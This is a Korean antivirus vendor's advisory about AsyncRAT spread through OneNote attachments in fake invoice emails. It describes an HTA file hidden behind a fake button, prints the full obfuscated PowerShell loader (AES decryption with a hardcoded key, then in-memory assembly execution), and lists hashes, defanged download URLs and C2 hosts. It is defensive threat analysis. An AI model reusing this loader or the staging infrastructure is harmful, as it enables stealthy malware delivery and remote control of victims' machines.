본문 바로가기

공지사항

이스트시큐리티 소식을 알려드립니다.

OneNote 파일을 이용해 유포되는 AsyncRAT 주의!

보안공지 2023-01-19


OneNote 파일을 이용해 AsyncRAT이 유포되는 정황을 포착하여 사용자들의 각별한 주의가 요구됩니다. 

 

이번 공격에서 주목할만한 점은, 스팸메일 내 OneNote 파일(.one)을 첨부하여 공격을 시도하였다는 점 입니다. .one 확장자는 공격자들이 즐겨 사용하지 않는 확장자로, 사용자들이 정상 파일로 인지하여 실행할 가능성이 있어 주의가 필요합니다. 


[그림 1] Invoice를 위장한 스팸 메일

 

 .one 확장자는 OneNote 파일로, 사용자 PC에 OneNote가 설치 되어 있다면 실행가능하지만 OneNote가 설치되어 있지 않다면 실행할 수 없는 한계가 존재합니다.

 

 

* OneNote
MS에서 개발한 메모 작성 프로그램

 


만일 사용자가 메일에 첨부되어 있는 Invoice-****.one 파일을 실행하면 파일 화면을 위장한 미끼 화면과 함께 ‘CLICK TO VIEW DOCUMENT’ 을 보여주며 사용자의 클릭을 유도합니다.

 

[그림 2] .one 첨부파일 실행 화면

 

사실 ‘CLICK TO VIEW DOCUMENT’는 공격자가 그림상자를 이용하여 팝업처럼 보이게 제작한 것으로, 해당 그림상자 아래는 HTA(HTML 응용프로그램) 파일이 숨어 있습니다. 

 

 

[그림 3] 그림상자 뒤에 숨어있는 HTA 실행파일

 

사용자가 해당 그림상자를 클릭하면 경고창이 뜨며, ‘확인’ 버튼 클릭 시 악성 스크립트가 동작합니다.  


[그림 4] HTA 실행 시 경고 창


HTA 파일 내부 스크립트가 실행되면 백그라운드에서 파워쉘을 실행하여 특정 서버로 접속 후, cornell_notes.one, inv.bat 2개의 파일을 내려받아 각각  %temp% 폴더에 invoice.one, system32.bat 파일명으로 저장하고 실행합니다.

 

 

[그림 5] HTA 내부 코드

 

 invoice.one 파일은 정상 OneNote 파일로, 사용자에게 정상 파일을 보여주어 의심을 피하고자 시도합니다.  

 

[그림 6] 다운로드 된 정상 invoice.one 파일

 

동시에 백그라운드에서는 system32.bat 파일을 실행하고, 파워쉘을 이용하여 다음과 같은 명령어를 실행하여 추가 페이로드를 내려 받습니다.  

 

"system32.bat.exe" - noprofile - windowstyle hidden - ep bypass - command $wgyjo = [System.IO.File]::('txeTllAdaeR' [-1.. - 11] - join '')('system32.bat 파일 경로').Split([Environment]::NewLine);

foreach($uycIu in $wgyjo) {

    if ($uycIu.StartsWith(':: ')) {

        $FqERb = $uycIu.Substring(3);

        break;

    };

};

$wMVbN = [System.Convert]::('gnirtS46esaBmorF' [-1.. - 16] - join '')($FqERb);

$JIIVT = New - Object System.Security.Cryptography.AesManaged;

$JIIVT.Mode = [System.Security.Cryptography.CipherMode]::CBC;

$JIIVT.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;

$JIIVT.Key = [System.Convert]::('gnirtS46esaBmorF' [-1.. - 16] - join '')('VDXsoWecon550NX9Amz8NigcG2h3YCK0Y7b4J1K7dCo=');

$JIIVT.IV = [System.Convert]::('gnirtS46esaBmorF' [-1.. - 16] - join '')('LqnN7D8I9VRflOe0+JON9w==');

$oCpHH = $JIIVT.CreateDecryptor();

$wMVbN = $oCpHH.TransformFinalBlock($wMVbN, 0, $wMVbN.Length);

$oCpHH.Dispose();

$JIIVT.Dispose();

$ZkBxi = New - Object System.IO.MemoryStream(, $wMVbN);

$zbtzM = New - Object System.IO.MemoryStream;

$VLyGd = New - Object System.IO.Compression.GZipStream($ZkBxi, [IO.Compression.CompressionMode]::Decompress);

$VLyGd.CopyTo($zbtzM);

$VLyGd.Dispose();

$ZkBxi.Dispose();

$zbtzM.Dispose();

$wMVbN = $zbtzM.ToArray();

$tRlLs = [System.Reflection.Assembly]::('daoL' [-1.. - 4] - join '')($wMVbN);

$EjUgF = $tRlLs.EntryPoint;

$EjUgF.Invoke($null, (, [string[]]('')))

 

최종 페이로드는 AsyncRAT으로, 실행 후에는 사용자 시스템 정보, 백신 목록, OS, 사용자 이름, 설치 프로그램 목록, 실행 환경 등의 정보를 수집하여 전송하며, C2에 주기적으로 접속하여 공격자의 명령 하달을 대기합니다. 

 

[그림 7] 수집하는 사용자 정보 목록

 

사용자 여러분들께서는 수상한 이메일 내 첨부파일의 열람을 지양하시기 바라며, 알약과 같은 백신을 설치하여 악성코드의 공격을 대비하시기를 권고 드립니다. 

 

현재 알약에서는 해당 악성코드에 대하여 Trojan.Downloader.Script.gen , Backdoor.RAT.Async 등으로 탐지중에 있습니다. 

 

[Hash]
BA347F8BD24920DF5CEE61E400C300EF
96659C32D420F3A3C886FF8376E422D9
0D4B6061928A833562B3C47BEE0E5CA8
E43B4FEDE14317C34395E3697D3DA0D8

[URL]
hxxps://transfer[.]sh/feK5TO/inv.bat
hxxps://transfer[.]sh/KSg2FR/inv.bat

[C2]
mulla1.mywire[.]org
mulla2022.hopto[.]org
185.176[.]220.29